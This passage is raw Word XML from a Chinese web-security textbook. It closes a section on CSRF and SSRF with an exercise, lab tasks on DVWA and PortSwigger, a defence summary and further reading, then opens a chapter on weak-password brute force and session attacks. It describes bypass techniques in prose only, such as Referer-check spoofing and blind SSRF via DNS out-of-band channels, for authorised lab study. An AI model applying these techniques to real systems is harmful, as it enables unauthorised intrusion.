        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3：外部攻击者位于互联网，其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被企业边界防火墙的入站</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">禁止访问内网</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段。Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器则部署在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DMZ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或内网边缘，拥有到达内部数据库、管理面板、缓存服务的路由，且其出站连接被防火墙视为可信。SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">让攻击者借用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的网络身份，从“内部”向这些不可达服务发起请求，从而打破网络分段的隔离假设——防火墙只控制了谁可以“从外部来”，但没有控制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器“出去”后能访问哪里。这也是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御需要出站过滤的根本原因。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，将安全等级提升至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium，观察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关的防御措施（DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Medium </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Referer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头做了基础检查，尝试绕过其弱校验——如构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Referer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头使其包含合法域名以欺骗模式匹配）。②环境相关：DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">各等级的绕过策略因代码实现而异，目的是体会“仅依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Referer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">校验”的脆弱性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1113"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：注册并完成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块全部实验（Basic、Blind、Bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等），掌握盲</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">带外利用、不同协议和编码的绕过技巧。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的本质</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是滥用“浏览器自动附加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie”的信任模型，而非代码注入。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Anti-CSRF Token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构成当前最有效的纵深防御。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的本质</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是滥用“服务器可作为出站请求源”的网络信任，打破网络分段隔离。防御高度依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">出站白名单</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">协议限制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络层出站过滤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二者均属“请求伪造”家族，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">伪造的主体不同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是伪受害者发起请求，SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是伪服务器发起请求。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可根治；SSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">因业务多样，防御更多依赖纵深策略和服务端严格输入校验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御完全失效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——同源脚本可读取页面所有内容并主动发起请求。客户端安全的三大基石（XSS、CSRF、SOP）彼此耦合，任一裂痕将连锁影响整体防护，前节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的防御正是本节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御的前提。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Top 10 2017 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版独立分类调整为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2021 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版整合入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A01:2021 Broken Access Control </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的范畴——因为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本质上是一个访问控制失效问题。SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则独立分类为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A10:2021 Server-Side Request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Forgery。阅读</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原文以理解其演化逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS、CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块从原理、实验到绕过技巧的教学链路是最新且免费的最佳实践资源，强烈推荐作为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的进阶补充。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stuttard–Pinto《The Web Application Hacker’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook》（第二版）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 13 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（Attacking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Users: Cross-Site Scripting, CSRF, and UI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Redress）与第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（Attacking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Application Architecture: SSRF and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE）为客户端和架构侧请求伪造提供了至今仍有指导意义的纵深分析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch8（HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全要点）中关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie、SameSite、CORS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的基础是理解本节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF/SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的前提；Ch10.1（XSS）与本节的防御链紧密衔接——请确保客户端安全三大模块的整体理解。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="191"/>
    <w:bookmarkEnd w:id="192"/>
    <w:bookmarkStart w:id="205" w:name="认证与会话爆破会话攻击与文件类漏洞"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证与会话:爆破、会话攻击与文件类漏洞</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="193" w:name="弱口令爆破与会话攻击"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">弱口令爆破与会话攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【前置依赖框】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节内容基于以下前置知识：①HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie/Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制、HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法（GET/POST）与状态码，已见馆藏《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（应用层）及本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全要点）；②Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截与重放能力，已见本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章；③OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分类中“失效的身份认证（Broken</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication）”的宏观定位，已见本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章；④DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机的搭建与登录，已见本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章。本节不重讲上述内容，直接在其基础上展开弱口令爆破与特定会话攻击类型的原理与实操。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【前置依赖框结束】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【授权与隔离声明框】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令与操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">仅限于读者自己搭建的隔离实验环境、官方授权靶机平台（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP Broken Web Applications </w:t>
      </w:r>
      <w:r>
        <w:rPr>
